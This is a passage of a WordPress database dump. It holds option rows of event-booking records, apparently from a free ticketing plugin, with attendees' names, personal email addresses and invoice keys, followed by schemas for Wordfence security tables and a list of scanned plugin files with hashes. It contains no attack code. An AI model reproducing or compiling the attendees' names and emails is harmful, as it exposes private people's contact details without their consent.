\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268679\";s:19:\"translated_event_id\";s:6:\"268679\";s:4:\"date\";s:21:\"1688898600:1688902200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1688898600:1688902200\";}s:10:\"booking_id\";i:268786;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"304e4e102d0f073394e9941ab83e11b5\";}','no'),(7455033,'mec_cart_603555986','a:0:{}','no'),(7455410,'RNE29696','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:6:\"Jorge \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268679\";s:19:\"translated_event_id\";s:6:\"268679\";s:4:\"date\";s:21:\"1688898600:1688902200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1688898600:1688902200\";}s:10:\"booking_id\";i:268787;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"ceadc2f4f284019fac6266f5a1392a7f\";}','no'),(7455307,'mec_cart_644021547','a:0:{}','no'),(7455429,'OJP49096','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:17:\"Chukwuebuka Okwor\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268679\";s:19:\"translated_event_id\";s:6:\"268679\";s:4:\"date\";s:21:\"1688898600:1688902200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1688898600:1688902200\";}s:10:\"booking_id\";i:268788;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"951e39934f0cf51b6a4aa812a2358391\";}','no'),(7455412,'mec_cart_160099004','a:0:{}','no'),(7455448,'ZAH87590','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:14:\"Roger  Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268679\";s:19:\"translated_event_id\";s:6:\"268679\";s:4:\"date\";s:21:\"1688898600:1688902200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1688898600:1688902200\";}s:10:\"booking_id\";i:268789;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"589913211f08c2d0943c0456d0119eeb\";}','no'),(7455431,'mec_cart_761256888','a:0:{}','no'),(7541410,'folders_checked_for_thrive_conflict','yes','yes'),(7577965,'wpcode_snippets_errors','a:0:{}','yes'),(7557815,'TFL56477','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:17:\"Chukwuebuka Okwor\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"269109\";s:19:\"translated_event_id\";s:6:\"269109\";s:4:\"date\";s:21:\"1696761000:1696764600\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1696761000:1696764600\";}s:10:\"booking_id\";i:269176;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"54b72166121392c86c03618982e7929d\";}','no'),(7557867,'YDN56976','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:23:\"lynnschultept@gmail.com\";s:4:\"name\";s:4:\"Lynn\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"269109\";s:19:\"translated_event_id\";s:6:\"269109\";s:4:\"date\";s:21:\"1696761000:1696764600\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1696761000:1696764600\";}s:10:\"booking_id\";i:269177;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"54425c863e4447caeff6bbdf1ee0835d\";}','no'),(7494472,'MAD42041','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"sue2earth@msn.com\";s:4:\"name\";s:12:\"Susan Haebig\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268863\";s:19:\"translated_event_id\";s:6:\"268863\";s:4:\"date\";s:21:\"1691922600:1691926200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1691922600:1691926200\";}s:10:\"booking_id\";i:268891;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"7df228171b2ee1a7dee7afd2c5546515\";}','no'),(7494373,'mec_cart_944629406','a:0:{}','no'),(7604986,'media_folder_children','a:6:{i:52;a:1:{i:0;i:58;}i:34;a:3:{i:0;i:128;i:1;i:174;i:2;i:181;}i:108;a:1:{i:0;i:133;}i:174;a:4:{i:0;i:175;i:1;i:176;i:2;i:177;i:3;i:178;}i:169;a:1:{i:0;i:179;}i:173;a:1:{i:0;i:199;}}','yes'),(7523350,'nf_styler_form_id_61','a:1:{s:12:\"field-labels\";a:2:{s:9:\"font-size\";s:4:\"22px\";s:10:\"font-color\";s:7:\"#2b6399\";}}','yes'),(7542416,'_transient_wpstg.directory_listing.last_checked','1699350707','yes'),(7540967,'wpstg_missing_cloneName_routine_executed','1','yes'),(7481314,'mec_cart_173575253','a:0:{}','no'),(7481350,'GES73920','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:6:\"Chris2\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268863\";s:19:\"translated_event_id\";s:6:\"268863\";s:4:\"date\";s:21:\"1691922600:1691926200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1691922600:1691926200\";}s:10:\"booking_id\";i:268867;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"d5b5eafac28c9abaed8161b379975646\";}','no'),(7599770,'mec_cart_175661621','a:0:{}','no'),(7481312,'RGL40305','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:5:\"Chris\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268863\";s:19:\"translated_event_id\";s:6:\"268863\";s:4:\"date\";s:21:\"1691922600:1691926200\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1691922600:1691926200\";}s:10:\"booking_id\";i:268866;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"0ec878b0cc968dbe520867aa3ac30132\";}','no'),(7579325,'sm_user_consent','no','yes'),(7579326,'sm_show_beta_banner','false','yes'),(7540962,'wpstg_settings','a:8:{s:17:\"lastAnalyticsSend\";i:1700585357;s:10:\"queryLimit\";s:5:\"10000\";s:12:\"querySRLimit\";s:5:\"20000\";s:9:\"fileLimit\";s:2:\"50\";s:7:\"cpuLoad\";s:3:\"low\";s:9:\"batchSize\";s:1:\"2\";s:11:\"maxFileSize\";s:1:\"8\";s:9:\"optimizer\";i:1;}','yes'),(7579058,'rsssl_plusone_count','2','yes'),(7579059,'rsssl_admin_notices','empty','yes'),(7599783,'mec_cart_719313555','a:0:{}','no');
/*!40000 ALTER TABLE `wpcl_options` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_options` with 1602 row(s)
--

--
-- Table structure for table `wpcl_wfls_2fa_secrets`
--

DROP TABLE IF EXISTS `wpcl_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfls_2fa_secrets`
--

LOCK TABLES `wpcl_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wpcl_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfls_2fa_secrets` with 0 row(s)
--

--
-- Table structure for table `wpcl_ff_scheduled_actions`
--

DROP TABLE IF EXISTS `wpcl_ff_scheduled_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_ff_scheduled_actions` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `action` varchar(255) DEFAULT NULL,
  `form_id` bigint(20) unsigned DEFAULT NULL,
  `origin_id` bigint(20) unsigned DEFAULT NULL,
  `feed_id` bigint(20) unsigned DEFAULT NULL,
  `type` varchar(255) DEFAULT 'submission_action',
  `status` varchar(255) DEFAULT NULL,
  `data` longtext DEFAULT NULL,
  `note` tinytext DEFAULT NULL,
  `retry_count` int(10) unsigned DEFAULT 0,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_ff_scheduled_actions`
--

LOCK TABLES `wpcl_ff_scheduled_actions` WRITE;
/*!40000 ALTER TABLE `wpcl_ff_scheduled_actions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_ff_scheduled_actions` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_ff_scheduled_actions` with 0 row(s)
--

--
-- Table structure for table `wpcl_links`
--

DROP TABLE IF EXISTS `wpcl_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_links`
--

LOCK TABLES `wpcl_links` WRITE;
/*!40000 ALTER TABLE `wpcl_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_links` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_links` with 0 row(s)
--

--
-- Table structure for table `wpcl_wfpendingissues`
--

DROP TABLE IF EXISTS `wpcl_wfpendingissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfpendingissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfpendingissues`
--

LOCK TABLES `wpcl_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wpcl_wfpendingissues` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfpendingissues` with 0 row(s)
--

--
-- Table structure for table `wpcl_wffilemods`
--

DROP TABLE IF EXISTS `wpcl_wffilemods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `real_path` text NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wffilemods`
--

LOCK TABLES `wpcl_wffilemods` WRITE;
/*!40000 ALTER TABLE `wpcl_wffilemods` DISABLE KEYS */;
INSERT INTO `wpcl_wffilemods` VALUES (0x1E74F5DA9A3455399A7494DA5E615489,'wp-content/plugins/404page/404page.php','/home/eckank5/public_html/wp-content/plugins/404page/404page.php',1,0x00000000000000000000000000000000,0x8CA2C618F50F1163E27C8EB5727C63BA,0x1F933CF301C8E2A06877852D30FB8351EA6F48646892649FD808785D1BC35E53,'',0,'?'),(0x5A6BA273E1AAE5E36F22E6A35DD2E7B0,'wp-content/plugins/404page/assets/css/404page-ui.css','/home/eckank5/public_html/wp-content/plugins/404page/assets/css/404page-ui.css',1,0x00000000000000000000000000000000,0xA8645211805B6283C24F5FADC2C484FD,0x645035008087D6A351BA527178BDDBFBAEB86B463F51FCD8FB0B2C5D2582B2DC,'',0,'?'),(0xEA0B16848AC7CC8C43A4F0472BE3490E,'wp-content/plugins/404page/assets/css/lity.min.css','/home/eckank5/public_html/wp-content/plugins/404page/assets/css/lity.min.css',1,0x00000000000000000000000000000000,0x7C61DD24902DDFFEB45C353C82F2D7E0,0xA99001156FDD1E77F0B2014C43C49F3F01ADEA6C3A53220247236453937EE987,'',0,'?'),(0xE3CE5F45510C0FEC1AD2A659AF1909A8,'wp-content/plugins/404page/assets/img/index.php','/home/eckank5/public_html/wp-content/plugins/404page/assets/img/index.php',1,0x00000000000000000000000000000000,0x03EFE17B1C4A21753F7D07EE17E77395,0x4175CC83B59CC460FC3989377D628E3E4D48EA0EC302ED4A4868E5FBCE7C466A,'',0,'?'),(0x72C40B6D647ADC5E372F3D903317DFC3,'wp-content/plugins/404page/assets/img/videos/404page-advanced-settings-quick-overview.png','/home/eckank5/public_html/wp-content/plugins/404page/assets/img/videos/404page-advanced-settings-quick-overview.png',1,0x00000000000000000000000000000000,0x22CC8CFD4F73F37DDB20AD879B6E58E9,0x738700CB61829ABABCC99F44DC46EEABD4A8A65356249323E0944100D335D422,'',0,'?'),(0x52B8F6429EBD65247E1CCDA5407190B7,'wp-content/plugins/404page/assets/img/videos/404page-brief-intro.png','/home/eckank5/public_html/wp-content/plugins/404page/assets/img/videos/404page-brief-intro.png',1,0x00000000000000000000000000000000,0xAFB9B287FF3805368A4FD2658FCF1483,0x3B5AEEDED2CF107E50D0798AF3746808E6B988C850063DC1CD4BF038EB2658C2,'',0,'?'),(0xC35623825C511600A8443A823FE17FDC,'wp-content/plugins/404page/assets/img/videos/404page_advanced_410_trashed_objects.png','/home/eckank5/public_html/wp-content/plugins/404page/assets/img/videos/404page_advanced_410_trashed_objects.png',1,0x00000000000000000000000000000000,0xDE9FF2FEBDD3C4C1684B3B3EA981343C,0xF304D9A46217AE427EB1B57CB79D60B5DA917C2971DAD0F289DDC18B56FE11C4,'',0,'?'),(0xEAF3FABC7B9ACE96BB00D81F094085A8,'wp-content/plugins/404page/assets/img/videos/404page_advanced_compatibility_mode.png','/home/eckank5/public_html/wp-content/plugins/404page/assets/img/videos/404page_advanced_compatibility_mode.png',1,0x00000000000000000000000000000000,0x20078034905A95E86B80D8E459B7A7E0,0x61E120A919151E268097A2CA191D0E56D180BAC282D968D37DDE2513996DA635,'',0,'?'),(0xBFB6CCDB45D0C877EFA5CBC42F1922BA,'wp-content/plugins/404page/assets/img/videos/404page_advanced_force_404.png','/home/eckank5/public_html/wp-content/plugins/404page/assets/img/videos/404page_advanced_force_404.png',1,0x00000000000000000000000000000000,0xABC4D0034D75B89E7C66A028A67B9736,0x98776D268B65B36729A88008B54E1B517A234897EEDA3971162581A338147B00,'',0,'?'),(0x5F893B7517C6D335B17EC49CA4061BD1,'wp-content/plugins/404page/assets/img/videos/404page_advanced_url_guessing.png','/home/eckank5/public_html/wp-content/plugins/404page/assets/img/videos/404page_advanced_url_guessing.png',1,0x00000000000000000000000000000000,0x01B3BEAB462B45B89F4BF78EDE371103,0xF57EC551F7BDDBD60E21C866903F5DAE3A6E5FEEF9C84A0486279548AA3E1032,'',0,'?'),(0xE8149E8E56AC7801FE237DCE389D2F1F,'wp-content/plugins/404page/assets/img/videos/index.php','/home/eckank5/public_html/wp-content/plugins/404page/assets/img/videos/index.php',1,0x00000000000000000000000000000000,0x03EFE17B1C4A21753F7D07EE17E77395,0x4175CC83B59CC460FC3989377D628E3E4D48EA0EC302ED4A4868E5FBCE7C466A,'',0,'?'),(0x67338A9BFEC7017F761853B86A775109,'wp-content/plugins/404page/assets/index.php','/home/eckank5/public_html/wp-content/plugins/404page/assets/index.php',1,0x00000000000000000000000000000000,0x03EFE17B1C4A21753F7D07EE17E77395,0x4175CC83B59CC460FC3989377D628E3E4D48EA0EC302ED4A4868E5FBCE7C466A,'',0,'?'),(0xAABC07BDD2DC8B02187E4744020E9F32,'wp-content/plugins/404page/assets/js/404page-ui.js','/home/eckank5/public_html/wp-content/plugins/404page/assets/js/404page-ui.js',1,0x00000000000000000000000000000000,0x1651EDE5435C89AFD4A714BADC99620B,0x1F6D7ADFA0798B9E87985D8744220BD0BBEEF3D22B21896B0451DC358289D1C9,'',0,'?'),(0xB1247E4D6ECA966C8135DCC55409FEFC,'wp-content/plugins/404page/assets/js/404page.js','/home/eckank5/public_html/wp-content/plugins/404page/assets/js/404page.js',1,0x00000000000000000000000000000000,0x360803C5ACA6BDE9B556AB02DA492ADB,0x1F0ECC87D860F6A50CACB0F24E1183CA0F799CC4F44FB7B71070F5E1BD390E39,'',0,'?'),(0x53127E7FDD0B1478F9689AB4C3708B59,'wp-content/plugins/404page/assets/js/block.js','/home/eckank5/public_html/wp-content/plugins/404page/assets/js/block.js',1,0x00000000000000000000000000000000,0x9DF42E9FAC3575A1805AFD3417F72C73,0xCDA3FA854BB0F4DF355C2804ABEC20CCFE435BE47B08E4BE203DC4E60FF2C4B4,'',0,'?'),(0x4C2BFE321D5521772BA65E00538EA535,'wp-content/plugins/404page/assets/js/index.php','/home/eckank5/public_html/wp-content/plugins/404page/assets/js/index.php',1,0x00000000000000000000000000000000,0x03EFE17B1C4A21753F7D07EE17E77395,0x4175CC83B59CC460FC3989377D628E3E4D48EA0EC302ED4A4868E5FBCE7C466A,'',0,'?'),(0xE8765F361DEAFBDA1077571405FC05E4,'wp-content/plugins/404page/assets/js/lity.min.js','/home/eckank5/public_html/wp-content/plugins/404page/assets/js/lity.min.js',1,0x00000000000000000000000000000000,0x30F043B7215544DFE4C5965E3710AE78,0x398983C476605A592D9C9B7995024295BB2301BB210D1F40BC8BA9C434478912,'',0,'?'),(0x31B53A062BA13F1E089AF0B36D77A452,'wp-content/plugins/404page/block.json','/home/eckank5/public_html/wp-content/plugins/404page/block.json',1,0x00000000000000000000000000000000,0x71B83411F078EBA1B35E68180AFEC87F,0xF15F989537D2C1AA7650BAE7D6F7AF0D9ADA05FF4F04D1E3F384E17620D8BE53,'',0,'?'),(0x974D22C33F2E7938417D7FCF818AF97A,'wp-content/plugins/404page/block.php','/home/eckank5/public_html/wp-content/plugins/404page/block.php',1,0x00000000000000000000000000000000,0x61A675D3E4BE5BB740B3AC45998D5ACA,0x99EC2FBFE0C619B00AAA580FC6A3EE174A437674ACDCC29F44F453FE9C57FE0A,'',0,'?'),(0x10AF16CEF753E34A5968CCD73A730024,'wp-content/plugins/404page/functions.php','/home/eckank5/public_html/wp-content/plugins/404page/functions.php',1,0x00000000000000000000000000000000,0x6F50EAD0666289B9F4EB4BAA71F7D99C,0x4A83A1EEFC3FB28597244E67C51E3BD4209D5957EC1D5AEF6E109984ABE25BBA,'',0,'?'),(0x7DFE5573A552C8EC7C68B15F1766D8E0,'wp-content/plugins/404page/inc/admin/404page-admin-page.php','/home/eckank5/public_html/wp-content/plugins/404page/inc/admin/404page-admin-page.php',1,0x00000000000000000000000000000000,0xE40DE26342DA29512FE83A29A5B1ED47,0x2D7199FCE9F9977F145B721460F3C9F5A9CFB9A491CC2D14FDAAEA1F48CBE219,'',0,'?'),(0x6A07097EDB2D235CD1077CC19DA3078F,'wp-content/plugins/404page/inc/admin/index.php','/home/eckank5/public_html/wp-content/plugins/404page/inc/admin/index.php',1,0x00000000000000000000000000000000,0x03EFE17B1C4A21753F7D07EE17E77395,0x4175CC83B59CC460FC3989377D628E3E4D48EA0EC302ED4A4868E5FBCE7C466A,'',0,'?'),(0x2D572AC5E0EE317044E1CC094CCB99C2,'wp-content/plugins/404page/inc/class-404page-admin.php','/home/eckank5/public_html/wp-content/plugins/404page/inc/class-404page-admin.php',1,0x00000000000000000000000000000000,0x3F0CAC67E941EE134AEB80FCD6740F13,0xA1EF305E6AE72F6456542BB8721FB2A433E11